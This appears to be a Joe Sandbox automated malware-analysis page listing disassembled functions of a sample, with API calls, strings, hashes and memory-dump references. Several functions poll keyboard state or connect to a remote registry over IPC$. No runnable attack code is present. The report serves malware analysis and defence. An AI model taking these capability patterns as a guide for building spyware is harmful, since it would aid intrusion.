                                                                                                                                                                                                                                                                                                                            • Opcode ID: cd20d9d6a3603dd4922ffa5aeeb03eabfe25b8d03edd9ee9accb07ccb608ce0c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: e66d7360c96c40f44675298b44e10491334123bb7257a94e2b3bbc59da3e1002
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd20d9d6a3603dd4922ffa5aeeb03eabfe25b8d03edd9ee9accb07ccb608ce0c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE11A371A7026979EB20B7A5DC4AEFF6B7CEFE2B00F40047A7401E20D0DBA05D54C5A1
                                                                                                                                                                                                                                                                                                                            Function 00202FF3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00203007
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00202D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0020DB51,002A1DC4,00000000,002A1DC4,00000000,?,0020DB78,002A1DC4,00000007,002A1DC4,?,0020DF75,002A1DC4), ref: 00202D4E
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00202D38: GetLastError.KERNEL32(002A1DC4,?,0020DB51,002A1DC4,00000000,002A1DC4,00000000,?,0020DB78,002A1DC4,00000007,002A1DC4,?,0020DF75,002A1DC4,002A1DC4), ref: 00202D60
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00203013
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0020301E
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00203029
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00203034
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0020303F
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0020304A
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00203055
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00203060
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0020306E
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                            • String ID: &'
                                                                                                                                                                                                                                                                                                                            • API String ID: 776569668-2196087507
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 01cd308fff2821415bbf6ac870b6bf6f3f7b3ba5a3ff81554a8478c174d1dfb9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: da0800e6498e0b7b9fb3a797ed740595bfb53b437e9db5a879e95f182b4c13a9
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 01cd308fff2821415bbf6ac870b6bf6f3f7b3ba5a3ff81554a8478c174d1dfb9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF11A776520208EFCB01EF54C986DDD3BA9EF05350B8144A6F9089B163D631EE65AF50
                                                                                                                                                                                                                                                                                                                            Function 0023A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 0023A9D9
                                                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 0023AA44
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 0023AA64
                                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 0023AA7B
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 0023AAAA
                                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 0023AABB
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 0023AAE7
                                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 0023AAF5
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 0023AB1E
                                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 0023AB2C
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 0023AB55
                                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 0023AB63
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 0b18ab16c120addb14ead169bb6edfea5065744ae28526d0a49a4eb74694c263
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 44db956ae723a86a2ae80dc013e59b337aaa2021393e183cabccd2105ae181b0
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b18ab16c120addb14ead169bb6edfea5065744ae28526d0a49a4eb74694c263
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 195119A0A147CA29FB35DF708854BEAFFB59F12344F0845AAC5C21B1C2DA549B5CCB63
                                                                                                                                                                                                                                                                                                                            Function 0023662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00236649
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00236662
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 002366C0
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 002366D0
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 002366E2
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00236736
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00236744
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00236756
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00236798
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 002367AB
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 002367C1
                                                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 002367CE
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 778aaf6f14ddaee8bea690a0fd3b6684eaf38aa2d14bd0249ce324b989398d65
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 140d3cbcde8b71e2d5567944a0801591d6f737e29230bad3f3e099c17335de89
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 778aaf6f14ddaee8bea690a0fd3b6684eaf38aa2d14bd0249ce324b989398d65
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C5100B1F1020AAFDF18CF68DD99AAEBBB9FB48314F508129F515E7290D7709D148B50
                                                                                                                                                                                                                                                                                                                            Function 001D2128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D2234: GetWindowLongW.USER32(?,000000EB), ref: 001D2242
                                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 001D2152
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 259745315-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: b70ebd512e4f177274632d86dba9a58ba5d60ca11999baaf2f4a5e9d8682e055
                                                                                                                                                                                                                                                                                                                            • Instruction ID: a26edc9921200ce274a60b7179644e62d4ff5b7515658de34687982b171ebc02
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b70ebd512e4f177274632d86dba9a58ba5d60ca11999baaf2f4a5e9d8682e055
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D641EA31600644AFDB249F389C48BBA37B6AB67330F558256FAB6873E1C7719D42DB10
                                                                                                                                                                                                                                                                                                                            Function 001D13A6 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 155windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 002128D1
                                                                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 002128EA
                                                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002128FA
                                                                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00212912
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00212933
                                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001D11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00212942
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0021295F
                                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001D11F5,00000000,00000000,00000000,000000FF,00000000), ref: 0021296E
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 1268354404-1658319840
                                                                                                                                                                                                                                                                                                                            • Opcode ID: fceaeed22c52fa4f0e32101b6d9bacfb35733eb2c2cb76e434abf548be9726d0
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ec4d79a9c31e180c91e9d03975f0abec49d24b13c970677d9c46bf4ad438cf2a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fceaeed22c52fa4f0e32101b6d9bacfb35733eb2c2cb76e434abf548be9726d0
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80515B30A1020AFFDB24DF29DC45BAA77F5FB58720F204519F942962A0DB70E9A4DB50
                                                                                                                                                                                                                                                                                                                            Function 0026955E Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D19CD: GetCursorPos.USER32(?), ref: 001D19E1
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D19CD: ScreenToClient.USER32(00000000,?), ref: 001D19FE
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D19CD: GetAsyncKeyState.USER32(00000001), ref: 001D1A23
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D19CD: GetAsyncKeyState.USER32(00000002), ref: 001D1A3D
                                                                                                                                                                                                                                                                                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 002695C7
                                                                                                                                                                                                                                                                                                                            • ImageList_EndDrag.COMCTL32 ref: 002695CD
                                                                                                                                                                                                                                                                                                                            • ReleaseCapture.USER32 ref: 002695D3
                                                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 0026966E
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00269681
                                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 0026975B
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID$(*$(*
                                                                                                                                                                                                                                                                                                                            • API String ID: 1924731296-1629406331
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 52ff4e612322241edc4c52f08870b30d8a9511fece55dac140b8511eee1eb1ef
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 68bbbc63f06f8abffea7a0b18584713b7bcd4ab28aae5befddcd3ae352e6836e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52ff4e612322241edc4c52f08870b30d8a9511fece55dac140b8511eee1eb1ef
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA51FE70614304AFD700EF14DC8AFAA77E8FB98B10F400A1DF996972E2CB709958CB52
                                                                                                                                                                                                                                                                                                                            Function 0023A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00220D31,00000001,0000138C,00000001,00000000,00000001,?,0024EEAE,002A2430), ref: 0023A091
                                                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000,?,00220D31,00000001), ref: 0023A09A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00220D31,00000001,0000138C,00000001,00000000,00000001,?,0024EEAE,002A2430,?), ref: 0023A0BC
                                                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000,?,00220D31,00000001), ref: 0023A0BF
                                                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0023A1E0
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                                                            • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a3bbad7f5328108eeb045078941e1bd99a3e9aa5a51b8640356a9264e6d3c559
                                                                                                                                                                                                                                                                                                                            • Instruction ID: bcad581f7a3795bcac0c609531d0be01a43a863994b5eb45c0ef4052f4acf193
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3bbad7f5328108eeb045078941e1bd99a3e9aa5a51b8640356a9264e6d3c559
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A841417291420DAACF04FBE0DD86DEEB779AF28700F500066F506B2192EB756F59CB61
                                                                                                                                                                                                                                                                                                                            Function 00230FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D8577: _wcslen.LIBCMT ref: 001D858A
                                                                                                                                                                                                                                                                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00231093
                                                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002310AF
                                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002310CB
                                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002310F5
                                                                                                                                                                                                                                                                                                                            • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0023111D
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00231128
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0023112D
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                                                            • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 081ce3c8091846b1fe3e346b36a94582289b1389d61f83edf1c8c74751a5668e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f059e8758c2faa71d3d4b7128178be16a6cd2bc4c2eb2789bb7b1514a484efec
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 081ce3c8091846b1fe3e346b36a94582289b1389d61f83edf1c8c74751a5668e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2410872D1022DABDF15EFA4EC85DEEB7B9BF18750F04402AE905A3260EB719E15CB50
                                                                                                                                                                                                                                                                                                                            Function 00264A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00264AD9
                                                                                                                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00264AE0
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00264AF3
                                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00264AFB
                                                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00264B06
                                                                                                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00264B10
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00264B1A
                                                                                                                                                                                                                                                                                                                            • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00264B30
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00264B3C
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
